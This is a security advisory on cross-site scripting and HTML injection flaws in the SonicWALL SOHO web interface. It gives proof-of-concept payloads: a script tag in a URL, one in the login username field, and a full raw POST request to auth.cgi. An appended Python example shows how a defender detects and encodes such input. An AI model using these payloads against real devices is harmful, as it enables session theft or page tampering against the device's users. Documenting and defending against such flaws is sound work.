SonicWALL SOHO Web Interface Multiple Remote Input Validation Vulnerabilities

No exploit is required to leverage either of these issues. The following proofs of concept have been made available:

To leverage the cross-site scripting issue:
http://www.example.com/<script>alert("Its not magic... its a sonic")</script>

To leverage the HTML injection issue, enter the following into the 'username' field of the login form:

</TD><script>alert("!")</script>

It is also possible to leverage the HTML injection issue by submitting the following POST request:

POST http://192.168.168.168:80/auth.cgi HTTP/1.0
Accept: */*
Referer: http://192.168.168.168/auth.html
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: BadGuy
Host: 192.168.168.168
Content-Length: 160
Pragma: no-cache

uName=</TD><script>alert("Its_not_magic..._its_a_sonic")</script>&pass=NiceTry&Submit=Login&clientHash=bbe63bb858b02e741d2d12023ee350a1
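Added example (not part of the original advisory and not SonicWALL code): a defender's check that parses a form body like the one in the request above, flags fields carrying HTML markup characters, and shows the output encoding that keeps an echoed username inside its table cell. The function names and the error-page fragment are assumptions made for illustration; the device's real page markup is not shown in the advisory.

```python
import html
from urllib.parse import parse_qsl

# Characters that let a value break out of an HTML text or attribute context.
MARKUP_CHARS = set("<>\"'&")

# Form body copied from the POST request in the advisory above.
SAMPLE_BODY = (
    'uName=</TD><script>alert("Its_not_magic..._its_a_sonic")</script>'
    "&pass=NiceTry&Submit=Login"
    "&clientHash=bbe63bb858b02e741d2d12023ee350a1"
)


def suspicious_fields(body):
    """Return the decoded form fields whose value contains markup characters.

    Suitable for a reverse proxy or log review in front of auth.cgi: a login
    name has no legitimate reason to contain any of these characters.
    """
    fields = parse_qsl(body, keep_blank_values=True)
    return {name: value for name, value in fields if MARKUP_CHARS & set(value)}


def encode_for_html(value):
    """Encode a request-derived value before it is written into a page."""
    return html.escape(value, quote=True)


def render_login_error(username):
    """Hypothetical error-page fragment that echoes the submitted username.

    Assumption: the name is reflected inside a table cell, which is what the
    leading </TD> in the advisory's input suggests.
    """
    return "<TR><TD>Login failed for " + encode_for_html(username) + "</TD></TR>"


if __name__ == "__main__":
    flagged = suspicious_fields(SAMPLE_BODY)
    for name, value in flagged.items():
        print("flagged field:", name)
        print("encoded echo :", render_login_error(value))
```

The same encoding applies to the request path echoed by the cross-site scripting issue: any part of the URL written back into a page goes through encode_for_html first.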


 

Copyright 2010, SecurityFocus